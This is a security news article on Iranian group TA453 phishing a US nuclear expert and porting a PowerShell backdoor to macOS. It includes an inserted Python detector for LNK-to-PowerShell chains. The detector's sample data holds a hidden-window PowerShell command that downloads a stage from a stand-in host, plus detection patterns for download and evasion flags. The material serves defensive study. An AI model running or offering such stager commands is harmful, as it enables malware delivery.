Iranian hackers targeted nuclear expert, ported Windows infection chain to Mac in a week
Fresh research demonstrates the sophistication and capability of state-sponsored threat actors to compromise diverse targets


New research has shown the flexibility of threat actors to rapidly iterate attack patterns in order to bypass security controls.
An investigation from security firm Proofpoint into a recent attack targeting a nuclear security expert at a US-based think tank revealed how well-resourced attackers change tactics on the fly to compromise different machines.
After realizing their initial payload wouldn’t work on a Mac, they quickly pivoted to new techniques known to work on targets who used Apple hardware.
The sophisticated operation saw skilled threat actors devise a seemingly benign email chain with the high-profile target and continue the conversation over the course of weeks to build trust and rapport, exploiting that to launch further attacks.
How the attack unfolded
The mid-May 2023 attack came from TA453, an Iranian state-affiliated threat actor also tracked under the monikers Charming Kitten, APT42, Mint Sandstorm and Yellow Garuda. The group posed as members of the Royal United Services Institute (RUSI).
Using a multi-persona approach, the attackers - known for conducting espionage operations - started an email chain with the target seemingly seeking feedback on a project titled ‘Iran in the Global Security Context’.
The attackers sent multiple messages from different accounts, all referencing each other to generate a feeling of authenticity - a technique seen before in email hijacking campaigns.
After a single seemingly benign interaction, a malicious Google Script macro was delivered, intended to direct the target to a Dropbox URL. The URL hosted a password-encrypted .rar file, which contained a dropper masquerading as a PDF but was actually a Windows LNK file.
Using LNK files has been a hallmark of cyber attacks since Microsoft blocked VBA macros by default last year. Exploiting VBA macros had for years been the go-to method for installing malware using maliciously crafted Microsoft 365 files.
Proofpoint said, “Using a .rar and LNK file to deploy malware differs from TA453’s typical infection chain of using VBA macros or remote template injection”.
“The LNK enclosed in the RAR used PowerShell to download additional stages from a cloud hosting provider.”
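A defender-side illustration of the Windows chain described above (a shortcut posing as a PDF that launches PowerShell to fetch later stages), added here as example code that is neither Proofpoint's nor the article's: a small detector run over constructed file-create and process-create events. Field names, the sample paths and command lines are assumptions, not observed indicators.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not real data). Field names are assumptions
# loosely modelled on Sysmon-style file-create and process-create events.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "file", "path": r"C:\Users\a\Downloads\rusi\Iran_in_the_Global_Security_Context.pdf.lnk"},
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -c "iwr https://files.example.invalid/s2 -OutFile $env:TEMP\\s2.ps1"'},
    {"type": "file", "path": r"C:\Users\a\Documents\quarterly_report.pdf"},
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\rotate_logs.ps1"},  # benign admin task
]

# A shortcut whose name ends in a document extension followed by .lnk
DOC_MASQUERADE_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk$", re.IGNORECASE)
# PowerShell primitives commonly used to pull later stages from the web
DOWNLOAD_HINTS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|start-bitstransfer|\bcurl\b",
    re.IGNORECASE)
# Launch flags that hide the console or bypass policy, typical of LNK-driven chains
EVASION_HINTS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|executionpolicy\s+bypass|-enc\b", re.IGNORECASE)
# Parents that mean a human double-clicked something (desktop shell or archive tool)
USER_LAUNCHERS = {"explorer.exe", "winrar.exe", "7zfm.exe"}


def flag_events(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for events matching the LNK -> PowerShell pattern."""
    findings: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if ev["type"] == "file" and DOC_MASQUERADE_LNK.search(ev["path"]):
            findings.append((i, "shortcut masquerading as a document"))
        elif ev["type"] == "process" and ev["image"].lower() == "powershell.exe":
            launched_by_user = ev["parent"].lower() in USER_LAUNCHERS
            cmd = ev["cmdline"]
            if launched_by_user and DOWNLOAD_HINTS.search(cmd) and EVASION_HINTS.search(cmd):
                findings.append((i, "user-launched PowerShell fetching a remote stage"))
    return findings


if __name__ == "__main__":
    for idx, why in flag_events(SAMPLE_EVENTS):
        print(f"event {idx}: {why}")
```

The file rule catches the double-extension lure at extraction time; the process rule only fires when a user-driven parent, a download primitive and an evasion flag all coincide, so ordinary scripted PowerShell is not flagged.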
However, the target was using an Apple computer, meaning that the delivered file would not run. The file it attempted to deliver was a newly identified PowerShell-based backdoor called GorjolEcho.
Once it realized GorjolEcho would not execute on macOS, TA453 then pivoted to re-launch the attack at a later date using a ported version of the backdoor that worked on Apple hardware.
The attackers continued the same seemingly innocent email conversation with the target and roughly a week after the initial Windows-based attempt, they relaunched the attack with the Apple-ported backdoor.
In this case, the malware was delivered via a password-protected ZIP file masquerading as a RUSI VPN solution and shared drive.
After some interactions with the threat actor, the user would be persuaded to open the file. A series of bash scripts would have then installed a backdoor, dubbed NokNok.
Proofpoint judged that this was intended to serve as a foothold for further instruction and was almost certainly a port of the PowerShell backdoor.
The incident serves as a reminder of the adaptability of the threat actors. In this instance, LNK files were sent instead of Microsoft Word documents with macros, and the backdoor was swiftly ported to macOS when the opportunity arose.
The state of Mac malware
As Apple hardware has become progressively more popular in the enterprise, it has become correspondingly more of a target for threat actors.
That said, according to Apple management specialist Jamf, in 2022 there was a drop in new malware infections.
In its 2023 State of Malware report, Malwarebytes noted that while Mac malware was rare, it did exist. 11% of machines with detection events were infected by malware.
However, Michael Covington, VP of portfolio strategy at Jamf, told ITPro that 2023 had been a very active period for Apple security.
He said: “In the first half of the year, we saw some noteworthy developments in the threat landscape indicating that attacks against Apple devices were changing, both in terms of intensity and purpose”.
“During this time, we saw the first real instance of ransomware emerge that was built specifically to target macOS. We also saw new malware in distribution, attributed to state-sponsored attackers, that used novel evasion techniques to avoid detection and bypass built-in platform protections to take root.”
Covington also noted the rise of cryptojacking threats aimed at Apple processors and the continued evolution of spyware used against high-risk individuals, primarily in government and media, while also commending Apple’s actions to address active exploits.
He also warned of the risk posed by gullible or distracted users, particularly with regard to phishing attacks.
Proofpoint’s research is evidence of the adaptability of threat actors, their ability to respond to changes in the environment, and the continually evolving threat landscape.
Joshua Miller of Proofpoint said: “TA453’s capability and willingness to devote resources into new tooling to compromise its targets exemplifies the persistence of state-aligned cyber threats”.
“The threat actor’s continued efforts to iterate their infection chains to bypass security controls demonstrate how important a strong community-informed defense is to frustrate even the most advanced adversaries.”

Richard Speed is an expert in databases, DevOps and IT regulations and governance. He was previously a Staff Writer for ITPro, CloudPro and ChannelPro, before going freelance. He first joined Future in 2023 having worked as a reporter for The Register. He has also attended numerous domestic and international events, including Microsoft's Build and Ignite conferences and both US and EU KubeCons.
Prior to joining The Register, he spent a number of years working in IT in the pharmaceutical and financial sectors.